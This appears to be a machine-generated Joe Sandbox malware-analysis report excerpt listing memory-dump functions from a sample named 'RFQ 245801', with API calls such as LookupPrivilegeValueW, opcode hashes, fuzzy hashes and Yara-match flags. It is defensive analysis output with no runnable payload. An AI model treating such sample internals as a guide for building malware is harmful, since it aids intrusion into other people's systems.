                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                                                                  • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                                                                                                                  Function 01762BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                                                                                                                                                  • Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
                                                                                                                                                                                  • Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2
                                                                                                                                                                                  Function 01762AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                                                                                                                                                  • Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
                                                                                                                                                                                  • Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222
                                                                                                                                                                                  Function 01762D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                                                                                                                                                  • Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323
                                                                                                                                                                                  Function 01762D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                                                                                                                                                  • Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322
                                                                                                                                                                                  Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                                                                  • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                                                                                                  • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                                                                  • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                                                                                                                  Function 01762DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                                                                                                                                                  • Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                                                                                                                                                                  • Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722
                                                                                                                                                                                  Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                                                                  • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                                                                                                  • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                                                                                                                  Function 01762CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                                                                                                                  • Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
                                                                                                                                                                                  Function 01762F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                                                                                                                  • Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
                                                                                                                                                                                  Function 01762FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                                                                  • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                                                                                                                                                                  Function 01762FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                                                                  • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                                                                                                                                                                  • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                                                                                                                                                                  Function 01762F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                                                                  • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                                                                  • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                                                                                                                  Function 01762EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                                                                  • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                                                                                                  Function 01762E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                                                                  • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                                                                                                  • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                                                                                                  Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                  • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                                                                                  Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                  • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                                                                                                                                                                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 212 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                  • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                  • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                                                                                  Function 0041A791 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 243 41a791-41a79d 244 41a7a0-41a7ba call 41af30 243->244 245 41a723-41a727 243->245 249 41a7bf-41a7d4 LookupPrivilegeValueW 244->249 247 41a72f-41a744 245->247 248 41a72a call 41af30 245->248 248->247
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                  • Opcode ID: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                  • Instruction ID: 4f0e51a01ab46be95e7cd7a3d039ee2e35a66bd9743fa429f2e30aff352c1da8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: B101ADB52102086BDB10EF59DC80DEB73A9EF88318F01845AF90957342C630E9168AB5
                                                                                                                                                                                  Function 0041A632 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 263 41a632-41a656 264 41a65c-41a671 RtlFreeHeap 263->264 265 41a657 call 41af30 263->265 265->264
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                  • Opcode ID: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                  • Instruction ID: ee930675011bf31697f300d8cbe35b02760f94f29c7344f56dc328e1a5823920
                                                                                                                                                                                  • Opcode Fuzzy Hash: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F039B1221204ABD718EF58DC49EE777A9FF48750F118669FA485B242D631E811CBA0
                                                                                                                                                                                  Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 266 41a640-41a671 call 41af30 RtlFreeHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                  • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                                                                                                                                                                  Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                  • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                                                  Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
